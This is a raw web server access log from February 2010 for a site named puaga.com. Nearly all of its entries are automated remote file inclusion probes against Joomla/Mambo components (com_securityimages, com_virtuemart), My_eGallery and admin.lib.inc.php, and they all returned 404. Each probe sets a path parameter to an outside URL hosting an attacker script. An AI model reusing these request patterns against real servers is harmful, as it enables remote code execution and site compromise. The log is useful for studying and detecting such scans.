218.38.136.125 - - [07/Feb/2010:05:31:06 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:31:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:31:07 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:10 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:31:14 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:18 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:18 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:18 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:18 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:18 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:19 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:19 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:19 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:19 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:19 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:31:20 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:30 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:31 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:33 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:33 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:33 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:35 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:35 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:38 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:41 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:41 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:55 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:56 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:31:57 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:32:21 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:32:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:32:21 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:32 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:33 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:33 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:33 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:33 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:53 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:32:53 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:33:00 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:33:41 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:33:54 -0800] "GET /modules/My_eGallery/index.php?basepath=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:33:54 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:33:54 -0800] "GET /logs/access_100114.log/modules/My_eGallery/index.php?basepath=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:34:07 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:34:36 -0800] "GET /logs/access_100105.log/modules/My_eGallery/index.php?basepath=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:34:39 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:35:05 -0800] "GET /logs/access_100117.log//include/admin.lib.inc.php?site_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:35:05 -0800] "GET /include/admin.lib.inc.php?site_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:35:05 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:35:13 -0800] "GET /logs/access_100115.log//include/admin.lib.inc.php?site_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:35:16 -0800] "GET /v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:35:17 -0800] "GET /logs/access_100126.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:35:17 -0800] "GET /logs//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [07/Feb/2010:05:35:19 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [07/Feb/2010:05:35:19 -0800] "GET /login/needregister.php HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
89.36.175.10 - - [07/Feb/2010:05:35:37 -0800] "GET /logs//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:35:37 -0800] "GET /v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:35:38 -0800] "GET /logs/access_100126.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:35:42 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:35:42 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:35:53 -0800] "GET /logs/access_100122.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:36:14 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:36:18 -0800] "GET /logs/access_100122.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:36:18 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:36:38 -0800] "GET /logs/access_100105.log%20/modules/My_eGallery/index.php?basepath=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
77.88.25.28 - - [07/Feb/2010:05:37:14 -0800] "GET /logs/access_091210.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:38:04 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:38:14 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:38:19 -0800] "GET /logs//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:38:19 -0800] "GET /logs/access_100126.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:38:19 -0800] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:38:19 -0800] "GET /v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:05:38:29 -0800] "GET /logs/access_100113.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:39:27 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:39:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:39:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:39:27 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:39:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:39:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:41:31 -0800] "GET /logs/access_100112.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:41:31 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:41:31 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:41:42 -0800] "GET /logs/access_100124.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:19 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:19 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:24 -0800] "GET /logs/access_100112.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:35 -0800] "GET /logs/access_100124.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:54 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:54 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:42:54 -0800] "GET /logs/access_100112.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:43:11 -0800] "GET /logs/access_100124.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:13 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
